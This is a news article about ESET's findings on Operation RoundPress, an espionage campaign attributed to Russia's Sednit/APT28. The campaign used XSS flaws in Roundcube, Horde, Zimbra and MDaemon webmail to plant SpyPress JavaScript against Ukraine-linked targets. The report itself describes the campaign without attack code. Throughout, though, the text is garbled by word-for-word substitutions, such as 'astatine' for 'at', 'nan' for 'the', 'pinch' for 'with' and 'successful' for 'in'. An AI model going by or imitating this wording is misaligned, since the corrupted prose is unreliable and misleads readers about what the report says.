Russia-linked Spypress Malware Exploits Webmails To Spy On Ukraine

ESET reports connected RoundPress, a cyber espionage run by Russia’s Fancy Bear (Sednit) targeting Ukraine-related organizations via webmail vulnerabilities and SpyPress malware.

Cybersecurity researchers astatine ESET person revealed a blase cyber espionage campaign, codenamed RoundPress, assessing pinch “medium confidence” that it is orchestrated by nan Russian-backed Sednit group (aka APT28, Fancy Bear). This cognition is actively targeting organizations linked pinch nan ongoing conflict successful Ukraine, aiming to exfiltrate confidential information from susceptible webmail servers for illustration RoundCube.

The Sednit group, linked by nan US Department of Justice to nan 2016 Democratic National Committee (DNC) hack and tracked by Hackread.com successful attacks connected TV5Monde and WADA, has been employing targeted spearphishing emails successful nan RoundPress campaign.

These emails utilization Cross-Site Scripting (XSS) vulnerabilities successful various webmail platforms to inject malicious JavaScript code, dubbed SpyPress, into nan victim’s browser.

Exploiting Known and Zero-Day Vulnerabilities successful Webmail Systems

In ESET’s blog post, shared pinch Hackread.com, researchers noted that complete nan past 2 years, espionage groups person targeted webmail servers for illustration Roundcube and Zimbra for email theft owed to their outdated quality and distant vulnerability triggers making targeting easier.

In 2023, researchers observed Sednit exploiting CVE-2020-35730 successful Roundcube. However, successful 2024, nan run expanded to target vulnerabilities in:

• Horde (an older XSS flaw)

• Roundcube (CVE-2023-43770, patched connected September 14, 2023)

• Zimbra (CVE-2024-27443, besides known arsenic ZBUG-3730, patched connected March 1, 2024)

• MDaemon (CVE-2024-11182, a zero-day reported by researchers connected November 1, 2024, and patched successful type 24.5.1 connected November 14, 2024)

Compromise Chain (Source: ESET)

ESET noted a circumstantial spearphishing email sent connected September 29, 2023, from katecohen1984@portugalmailpt exploiting CVE‑2023‑43770 successful Roundcube. The emails often mimic news contented to entice victims to unfastened them, specified arsenic an email to a Ukrainian target connected September 11, 2024, from kyivinfo24@ukrnet astir an alleged apprehension successful Kharkiv, and different to a Bulgarian target connected November 8, 2024, from office@terembgcom regarding Putin and Trump.

Primary Focus connected Ukraine-Related Entities

The superior targets of Operation RoundPress successful 2024, arsenic identified done ESET telemetry and VirusTotal submissions, are predominantly Ukrainian governmental entities and defence companies successful Bulgaria and Romania, immoderate of which are producing Soviet-era weapons for Ukraine.

Researchers besides observed targeting of nationalist governments successful Greece, Cameroon, Ecuador, Serbia, and Cyprus (an world successful biology studies), a telecommunications patient for nan defence assemblage successful Bulgaria and a civilian aerial carrier institution and proscription authorities institution successful Ukraine.

The SpyPress malware variants (SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA) stock obfuscation techniques and pass pinch C2 servers via HTTP POST requests. However, their capabilities vary.

For instance, SpyPress.ROUNDCUBE has been observed creating Sieve rules to guardant each incoming emails to an attacker-controlled address, specified arsenic srezoska@skiffcom (Skiff being a privacy-oriented email service). SpyPress.MDAEMON demonstrated nan expertise to create App Passwords, granting persistent access.

Researchers concluded that nan ongoing exploitation of webmail vulnerabilities by groups for illustration Sednit underscores nan value of timely patching and beardown information measures to protect delicate accusation from specified targeted spying campaigns.

J Stephen Kowski, Field CTO astatine SlashNext Email Security+ commented connected nan latest development, stating, “Attacks for illustration Operation RoundPress show really quickly hackers tin displacement targets, particularly erstwhile they find weaknesses successful celebrated email platforms.“

“Whether you’re utilizing paid commercialized email systems aliases free, self-hosted open-source options for illustration RoundCube, nary solution is wholly safe – self-hosted systems often springiness a mendacious consciousness of information since they still request regular updates and master maintenance,“ he warned.

“The champion measurement to enactment up is by making judge email systems are ever updated and patched, utilizing beardown protections for illustration multi-factor authentication, and having devices that tin spot and artifact phishing emails earlier they scope users,” Kowski advised.